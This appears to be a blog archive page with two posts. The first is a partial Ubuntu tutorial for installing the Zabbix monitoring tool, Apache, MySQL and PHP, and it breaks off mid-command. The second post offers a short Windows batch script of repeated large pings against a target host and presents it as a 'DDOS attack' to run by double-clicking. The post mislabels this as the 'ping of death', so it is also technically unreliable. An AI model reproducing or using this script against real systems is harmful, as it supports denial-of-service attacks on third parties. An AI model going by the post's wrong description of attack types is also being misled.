Posts

Showing posts from May, 2020

How to configure Zabbix Monitoring tool on Ubuntu

Image
Here, I want to show you how to install Zabbix on Ubuntu 18.04, and along with the PHP and MySQL. Step #01:  First update and upgrade must be run on your server. root@zabbixserver:~#  apt update && apt-get upgrade Step #02:   Install apache webserver root@zabbixserver:~#  apt install apache2   Step #03:   Then install mysql database command below root@zabbixserver:~#   apt install mysql-server Step #04:   Install update version 7.2 needed for install Zabbix server.                       root@zabbixserver:~# apt install php php7.2-cli php7.2-mysql php7.2-common php7.2-curl php7.2-json php7.2-cgi libapache2-mod-php7.2 php7.2 Apache webserver now start command root@zabbixserver:~#   service apache2 start   Step #05:   Download Zabbix deb file from below link root@zabbixserver:~#   wget http://repo.zabbix.com/zabbix/3.5/ubuntu/pool/main/z/zabbix-release/zabbix-release_3.5-1%2Bbionic_all.deb Enable Zabbix repo for my server command below root@zabbixserver:~#   dpkg -i zabbix-relea

DDOS attack - Script

Image
Command to do a DDOS attack: --> This is also called as the ping of death attack Copy the below script into notepad and save it to .bat file.  Script: @echo off ping -n 2000 -l 500 <www.example.com> Then double click on bat file, DDOS attack will start